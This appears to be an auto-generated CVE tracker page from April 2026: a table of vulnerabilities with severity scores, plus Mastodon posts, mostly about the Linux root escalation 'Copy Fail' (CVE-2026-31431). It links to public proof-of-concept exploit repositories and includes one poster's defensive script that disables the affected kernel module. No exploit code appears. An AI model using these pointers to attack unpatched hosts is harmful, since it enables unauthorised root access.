## Updated at UTC 2026-04-29T23:38:45.601336

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-7418 8.8 0.00% 2 0 2026-04-29T22:16:22.620000 A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th
CVE-2026-34965 8.8 0.00% 2 0 2026-04-29T21:22:20.120000 Cockpit CMS contains an authenticated remote code execution vulnerability in the
CVE-2026-31431 7.8 0.01% 52 7 2026-04-29T21:16:20.910000 In the Linux kernel, the following vulnerability has been resolved: crypto: alg
CVE-2026-6849 8.8 0.00% 2 1 2026-04-29T21:13:30.563000 Improper neutralization of special elements used in an OS command ('OS command i
CVE-2026-7426 8.1 0.00% 2 0 2026-04-29T20:16:32.143000 Insufficient validation of the prefix length field in IPv6 Router Advertisement
CVE-2026-7466 8.8 0.00% 2 0 2026-04-29T19:16:27.013000 AgentFlow contains an arbitrary code execution vulnerability that allows attacke
CVE-2026-7424 8.1 0.00% 2 0 2026-04-29T19:16:26.743000 Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4
CVE-2026-41940 9.8 0.00% 7 2 2026-04-29T19:16:23.930000 cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0
CVE-2026-0204 8.0 0.00% 2 0 2026-04-29T18:31:42 A vulnerability in the access control mechanism of SonicOS may allow certain man
CVE-2026-5712 8.1 0.00% 2 0 2026-04-29T18:31:41 This vulnerability impacts all versions of IdentityIQ and allows an authenticate
CVE-2026-7344 8.8 0.01% 1 0 2026-04-29T15:31:44 Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.
CVE-2026-7343 9.8 0.03% 1 0 2026-04-29T15:31:43 Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo
CVE-2026-5760 9.8 0.38% 2 1 2026-04-29T15:31:38 SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) wh
CVE-2026-42515 None 0.05% 2 0 2026-04-29T09:30:25 This vulnerability exists in e-Sushrut due to improper access control in resourc
CVE-2026-42615 7.2 0.01% 2 0 2026-04-29T06:33:35 GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated
CVE-2026-7321 9.7 0.04% 2 0 2026-04-29T06:33:30 Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co
CVE-2026-23773 4.3 0.01% 1 0 2026-04-29T04:16:40.867000 Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Si
CVE-2026-41873 9.8 0.12% 2 0 2026-04-29T00:31:25 ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H
CVE-2026-42167 8.1 0.24% 5 2 2026-04-29T00:30:29 mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary
CVE-2026-32202 4.3 7.19% 13 0 2026-04-28T21:37:03 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-25874 9.8 0.11% 6 0 2026-04-28T21:37:03 LeRobot contains an unsafe deserialization vulnerability in the async inference
CVE-2026-24222 8.6 0.04% 2 0 2026-04-28T21:36:23 NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati
CVE-2026-24204 6.5 0.04% 1 0 2026-04-28T21:36:23 NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope
CVE-2026-24186 8.8 0.06% 2 0 2026-04-28T21:36:22 NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause
CVE-2026-24231 6.3 0.01% 1 0 2026-04-28T21:36:22 NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote
CVE-2026-24178 9.8 0.14% 2 0 2026-04-28T21:36:21 NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut
CVE-2024-1708 8.5 81.62% 8 3 2026-04-28T21:34:00 ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2026-7202 9.8 0.89% 2 0 2026-04-28T20:24:58.820000 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This aff
CVE-2026-7240 9.8 0.89% 1 0 2026-04-28T20:24:20.377000 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vul
CVE-2026-38651 8.2 0.04% 1 0 2026-04-28T20:23:20.703000 Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0.
CVE-2026-7279 7.8 0.01% 1 0 2026-04-28T20:22:38.260000 AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi
CVE-2025-67223 7.5 0.13% 1 1 2026-04-28T20:18:13.020000 The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be
CVE-2026-20766 8.8 0.04% 1 0 2026-04-28T20:11:56.713000 An out-of-bounds memory access vulnerability exists in specific firmware version
CVE-2026-40972 7.5 0.05% 1 0 2026-04-28T20:11:56.713000 An attacker on the same network as the remote application may be able to utilize
CVE-2026-7320 7.5 0.03% 1 0 2026-04-28T20:10:59.913000 Information disclosure due to incorrect boundary conditions in the Audio/Video c
CVE-2026-3893 9.4 0.06% 1 0 2026-04-28T20:10:23.367000 The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a
CVE-2026-41384 7.8 0.01% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.24 contains an environment variable injection vulnerabili
CVE-2026-41395 7.5 0.02% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 si
CVE-2026-41396 7.8 0.01% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B
CVE-2026-42422 8.8 0.04% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.toke
CVE-2026-42432 7.8 0.02% 1 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing
CVE-2026-3854 8.8 0.35% 42 4 2026-04-28T19:37:39.507000 An improper neutralization of special elements vulnerability was identified in G
CVE-2026-42431 None 0.03% 1 0 2026-04-28T18:30:21 ## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` pers
CVE-2026-42426 None 0.03% 1 0 2026-04-28T18:28:53 ## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead
CVE-2026-42423 None 0.04% 1 0 2026-04-28T18:28:19 ## Impact strictInlineEval explicit-approval boundary bypassed by approval-time
CVE-2026-41914 None 0.03% 1 0 2026-04-28T18:26:36 ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.
CVE-2026-41912 None 0.03% 1 0 2026-04-28T18:25:57 ## Impact Browser SSRF Policy Bypass via Interaction-Triggered Navigation. Bro
CVE-2026-41405 None 0.14% 1 0 2026-04-28T18:24:06 ## Summary MS Teams webhook parses body before JWT validation, enabling unauthen
CVE-2026-41404 None 0.07% 1 0 2026-04-28T18:23:43 ## Summary Incomplete scope-clearing fix allows operator.admin escalation via tr
CVE-2026-41399 None 0.05% 1 0 2026-04-28T18:22:28 ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket
CVE-2026-41394 None 0.05% 1 0 2026-04-28T18:20:50 ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scop
CVE-2026-41387 9.7 0.02% 1 0 2026-04-28T18:18:46 ## Summary Host exec env override sanitization did not fail closed for several
CVE-2026-41386 None 0.03% 1 0 2026-04-28T18:18:23 ## Summary Bootstrap setup codes were not bound to the intended device role and
CVE-2026-41383 None 0.04% 1 0 2026-04-28T18:17:19 ## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbi
CVE-2026-41378 None 0.18% 1 0 2026-04-28T18:15:32 ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen
CVE-2026-41602 7.5 0.13% 1 0 2026-04-28T15:31:54 Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G
CVE-2026-27760 8.1 0.10% 1 0 2026-04-28T15:30:58 OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in
CVE-2026-7289 8.8 0.04% 1 0 2026-04-28T15:30:58 A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func
CVE-2026-7288 8.8 0.04% 1 0 2026-04-28T15:30:58 A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff
CVE-2026-5944 8.2 0.09% 1 0 2026-04-28T15:30:52 An improper access control vulnerability exists in the Cisco Intersight Device C
CVE-2026-3323 7.5 0.01% 1 0 2026-04-28T12:31:36 An unsecured configuration interface on affected devices allows unauthenticated
CVE-2026-7242 9.8 0.89% 1 0 2026-04-28T09:34:20 A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Impacted
CVE-2026-7243 9.8 0.89% 1 0 2026-04-28T09:34:20 A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe
CVE-2026-7248 9.8 0.06% 1 0 2026-04-28T09:34:20 A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the functio
CVE-2026-7244 9.8 0.89% 1 0 2026-04-28T09:34:19 A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The
CVE-2026-5201 7.5 0.09% 1 1 2026-04-28T09:34:12 A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln
CVE-2026-32644 9.8 0.02% 2 0 2026-04-28T03:31:36 Specific firmware versions of Milesight AIOT cameras use SSL certificates with d
CVE-2026-7203 9.8 0.89% 2 0 2026-04-28T03:31:36 A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerab
CVE-2026-7204 9.8 0.89% 3 0 2026-04-28T03:31:36 A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This iss
CVE-2026-41371 8.5 0.04% 1 0 2026-04-28T00:31:48 OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.
CVE-2026-40976 9.1 0.04% 4 0 2026-04-28T00:31:47 In certain circumstances, Spring Boot's default web security is ineffective allo
CVE-2026-27785 8.8 0.01% 1 0 2026-04-28T00:31:47 Specific firmware versions of Milesight AIOT camera firmware contain hard-coded
CVE-2026-41364 8.1 0.15% 1 0 2026-04-28T00:31:47 OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sand
CVE-2026-7160 8.8 0.29% 1 0 2026-04-28T00:31:47 A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the
CVE-2026-31652 7.8 0.01% 1 0 2026-04-27T21:31:56 In the Linux kernel, the following vulnerability has been resolved: mm/damon/st
CVE-2026-31649 9.8 0.05% 1 0 2026-04-27T21:31:56 In the Linux kernel, the following vulnerability has been resolved: net: stmmac
CVE-2026-7155 9.8 0.89% 1 0 2026-04-27T21:31:12 A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005
CVE-2026-7156 9.8 0.89% 1 0 2026-04-27T21:31:12 A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected i
CVE-2026-30350 7.5 0.01% 1 0 2026-04-27T21:31:02 An issue in the /store/items/search endpoint of Agent Protocol server commit e9a
CVE-2026-31669 9.8 0.07% 1 0 2026-04-27T21:30:51 In the Linux kernel, the following vulnerability has been resolved: mptcp: fix
CVE-2026-31667 7.8 0.01% 1 0 2026-04-27T21:30:51 In the Linux kernel, the following vulnerability has been resolved: Input: uinp
CVE-2026-31665 7.8 0.01% 1 0 2026-04-27T21:30:51 In the Linux kernel, the following vulnerability has been resolved: netfilter:
CVE-2026-31662 7.5 0.05% 1 0 2026-04-27T21:30:50 In the Linux kernel, the following vulnerability has been resolved: tipc: fix b
CVE-2026-31657 9.8 0.06% 1 0 2026-04-27T21:30:50 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31648 7.8 0.01% 1 0 2026-04-27T21:30:49 In the Linux kernel, the following vulnerability has been resolved: mm: filemap
CVE-2026-31656 7.8 0.01% 1 0 2026-04-27T20:16:43.370000 In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt
CVE-2026-31650 7.8 0.01% 1 0 2026-04-27T20:14:35.180000 In the Linux kernel, the following vulnerability has been resolved: mmc: vub300
CVE-2026-31666 7.8 0.01% 1 0 2026-04-27T20:00:27.157000 In the Linux kernel, the following vulnerability has been resolved: btrfs: fix
CVE-2026-31663 7.8 0.01% 1 0 2026-04-27T19:59:32.810000 In the Linux kernel, the following vulnerability has been resolved: xfrm: hold
CVE-2026-42039 7.5 0.04% 1 0 2026-04-27T19:50:46.320000 Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.
CVE-2026-3008 6.6 0.01% 1 3 2026-04-27T18:57:20.293000 Successful exploitation of the string injection vulnerability could allow an att
CVE-2026-31680 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: net: ipv6:
CVE-2026-31676 7.5 0.04% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: rxrpc: only
CVE-2026-31683 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-33454 9.4 0.16% 1 0 2026-04-27T18:32:06 The Camel-Mail component is vulnerable to Camel message header injection. The cu
CVE-2026-41635 9.8 0.05% 1 0 2026-04-27T18:32:05 Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them
CVE-2026-40860 9.8 0.50% 1 0 2026-04-27T18:32:05 JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding clas
CVE-2026-31682 9.1 0.07% 1 0 2026-04-27T15:31:59 In the Linux kernel, the following vulnerability has been resolved: bridge: br_
CVE-2026-31685 9.4 0.05% 1 0 2026-04-27T15:31:59 In the Linux kernel, the following vulnerability has been resolved: netfilter:
CVE-2026-31659 9.8 0.05% 1 0 2026-04-27T15:31:56 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31678 7.8 0.01% 1 0 2026-04-27T15:30:51 In the Linux kernel, the following vulnerability has been resolved: openvswitch
CVE-2026-31675 7.8 0.01% 1 0 2026-04-27T15:30:51 In the Linux kernel, the following vulnerability has been resolved: net/sched:
CVE-2026-31673 7.8 0.01% 1 0 2026-04-27T15:30:50 In the Linux kernel, the following vulnerability has been resolved: af_unix: re
CVE-2026-31668 9.8 0.05% 1 0 2026-04-27T15:30:47 In the Linux kernel, the following vulnerability has been resolved: seg6: separ
CVE-2026-31637 9.8 0.05% 1 0 2026-04-27T15:30:46 In the Linux kernel, the following vulnerability has been resolved: rxrpc: reje
CVE-2026-40372 9.1 0.02% 2 0 2026-04-24T19:59:44 ## Executive Summary: A bug in `Microsoft.AspNetCore.DataProtection` 10.0.0-10
CVE-2026-41651 8.8 0.20% 1 6 2026-04-24T13:43:37.347000 PackageKit is a a D-Bus abstraction layer that allows the user to manage package
CVE-2026-35431 10.0 0.09% 1 0 2026-04-24T00:31:58 Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management
CVE-2026-5450 9.8 0.05% 1 0 2026-04-23T18:32:57 Calling the scanf family of functions with a %mc (malloc'd character match) in t
CVE-2026-33626 7.5 0.04% 1 0 2026-04-23T13:39:54.420000 LMDeploy is a toolkit for compressing, deploying, and serving large language mod
CVE-2026-3844 9.8 0.08% 1 4 2026-04-23T04:00:28 The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du
CVE-2026-35369 5.5 0.02% 1 0 2026-04-22T18:31:57 An argument parsing error in the kill utility of uutils coreutils incorrectly in
CVE-2026-22007 2.9 0.02% 1 0 2026-04-22T15:31:39 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Ente
CVE-2026-5588 0 0.01% 1 0 2026-04-21T16:16:20.540000 Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the
CVE-2025-61260 9.8 0.10% 1 0 2026-04-17T15:24:57.753000 A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl
CVE-2026-20148 4.9 0.06% 1 0 2026-04-17T15:09:46.880000 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2026-40261 8.8 0.04% 1 2 2026-04-16T21:55:08 ### Impact The `Perforce::syncCodeBase()` method appended the `$sourceReference`
CVE-2026-34197 8.8 65.07% 2 9 template 2026-04-16T21:49:17 Improper Input Validation, Improper Control of Generation of Code ('Code Injecti
CVE-2026-20147 10.0 0.28% 1 0 2026-04-15T18:32:04 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2025-60751 7.5 0.02% 1 1 2026-04-15T00:35:42.020000 GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDe
CVE-2026-40200 8.2 0.02% 1 0 2026-04-10T18:31:28 An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory co
CVE-2026-6042 3.3 0.01% 1 1 2026-04-10T12:31:44 A security flaw has been discovered in musl libc up to 1.2.6. Affected is the fu
CVE-2025-8065 6.5 0.08% 2 0 2026-04-03T17:16:41.710000 A stack-based buffer overflow vulnerability was identified in the ONVIF SOAP XML
CVE-2026-35414 4.2 0.02% 1 2 2026-04-02T18:31:50 OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon
CVE-2024-1709 10.0 94.32% 1 7 template 2026-03-21T05:29:22 ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Byp
CVE-2025-32432 10.0 87.87% 1 4 template 2026-03-20T21:28:38 ### Impact This is an additional fix for https://github.com/craftcms/cms/securi
CVE-2026-21510 8.8 3.35% 1 1 2026-02-10T21:31:29 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-24061 9.8 87.77% 1 69 template 2026-02-10T18:30:34 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2026-21509 7.8 10.86% 1 12 2026-02-10T15:30:22 Reliance on untrusted inputs in a security decision in Microsoft Office allows a
CVE-2026-22704 8.0 0.02% 1 0 2026-02-05T20:59:55.283000 HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions
CVE-2025-12383 None 0.04% 1 0 2026-02-05T15:43:37 In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori
CVE-2026-24421 6.5 0.02% 1 0 2026-01-28T04:43:47 ### Summary Authenticated non‑admin users can call /api/setup/backup and trigger
CVE-2025-68705 9.8 0.04% 1 1 2026-01-16T19:29:47.410000 RustFS is a distributed object storage system built in Rust. In versions 1.0.0-a
CVE-2025-68161 None 0.03% 1 0 2025-12-19T22:08:03 The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does
CVE-2025-59250 8.1 0.08% 1 0 2025-11-24T17:38:57 Improper input validation in JDBC Driver for SQL Server allows an unauthorized a
CVE-2025-48924 6.5 0.04% 1 1 2025-11-05T20:30:33 Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects
CVE-2024-21413 9.8 92.99% 1 35 2025-10-22T00:33:00 Microsoft Outlook Remote Code Execution Vulnerability
CVE-2019-1367 7.5 90.77% 2 1 2025-10-22T00:32:47 A remote code execution vulnerability exists in the way that the scripting engin
CVE-2025-59536 None 0.03% 1 4 2025-10-03T14:16:36 Due to a bug in the startup trust dialog implementation, Claude Code could be tr
CVE-2025-29787 None 0.33% 1 0 2025-03-19T15:51:05 ### Summary In the archive extraction routine of affected versions of the `zip
CVE-2022-24138 7.8 0.28% 1 0 2023-01-27T05:05:44 IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download
CVE-2025-6020 0 0.07% 1 0 N/A
CVE-2026-25262 0 0.00% 2 0 N/A
CVE-2026-42208 0 0.00% 4 1 N/A
CVE-2026-5545 0 0.00% 1 0 N/A
CVE-2026-6429 0 0.00% 1 0 N/A
CVE-2026-7168 0 0.00% 1 0 N/A
CVE-2026-6253 0 0.00% 1 0 N/A
CVE-2026-41649 0 0.03% 1 0 N/A
CVE-2025-54136 0 0.11% 1 1 N/A
CVE-2026-35177 0 0.01% 1 0 N/A

CVE-2026-7418
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T22:16:22.620000

2 posts

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34965
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T21:22:20.120000

2 posts

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via incl

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31431
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-29T21:16:20.910000

52 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just

7 repos

https://github.com/Theori-lO/copy-fail-CVE-2026-31431

https://github.com/rootsecdev/cve_2026_31431

https://github.com/badsectorlabs/copyfail-go

https://github.com/Alfredooe/CVE-2026-31431

https://github.com/mhdgning131/CVE-2026-31431_poc

https://github.com/theori-io/copy-fail-CVE-2026-31431

https://github.com/painoob/Copy-Fail-Exploit-CVE-2026-31431

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan at 2026-04-29T22:43:47.841Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

copy.fail/

##

marshray at 2026-04-29T22:21:07.283Z ##

This is what I'm pasting into my own linux systems to implement the mitigation suggested at the website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb at 2026-04-29T22:15:16.659Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/


##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

security-tracker.debian.org/tr

##

cR0w at 2026-04-29T21:55:48.287Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne at 2026-04-29T21:46:01.476Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

newsyc300@toot.community at 2026-04-29T21:43:29.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hackernewsrobot@mastodon.social at 2026-04-29T21:37:14.000Z ##

Copy Fail – CVE-2026-31431 copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

security-tracker.debian.org/tr

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

github.com/theori-io/copy-fail

##

newsyc250@toot.community at 2026-04-29T21:03:31.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily at 2026-04-29T20:32:32.891Z ##

@mttaggart And yet RHEL has "fix deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily at 2026-04-29T20:31:18.159Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

newsyc200@toot.community at 2026-04-29T20:23:26.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

copy.fail

security-tracker.debian.org/tr

ubuntu.com/security/CVE-2026-3

suse.com/security/cve/CVE-2026

#copyfail

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

xint.io/blog/copy-fail-linux-d

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
news.ycombinator.com/item?id=4

#hackernews #tech

##

giggls@karlsruhe-social.de at 2026-04-29T19:17:23.000Z ##

Hm security-tracker.debian.org/tr

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: copy.fail/
Comments: news.ycombinator.com/item?id=4

##

hackernewsdaily@bsd.cafe at 2026-04-29T19:00:08.000Z ##

📰 Today's Top 21 Hacker News Stories (Sorted by Score) 📰
----------------------------------------
🔖 Title: Ghostty is leaving GitHub
🔗 URL: mitchellh.com/writing/ghostty-
👍 Score: [3244]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Zed 1.0
🔗 URL: zed.dev/blog/zed-1-0
👍 Score: [1012]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Bugs Rust won't catch
🔗 URL: corrode.dev/blog/bugs-rust-won
👍 Score: [565]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Soft launch of open-source code platform for government
🔗 URL: nldigitalgovernment.nl/news/so
👍 Score: [456]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: We need a federation of forges
🔗 URL: blog.tangled.org/federation/
👍 Score: [413]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Online age verification is the hill to die on
🔗 URL: x.com/GlennMeder/status/204908
👍 Score: [407]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Mistral Medium 3.5
🔗 URL: mistral.ai/news/vibe-remote-ag
👍 Score: [263]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Cursor Camp
🔗 URL: neal.fun/cursor-camp/
👍 Score: [148]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
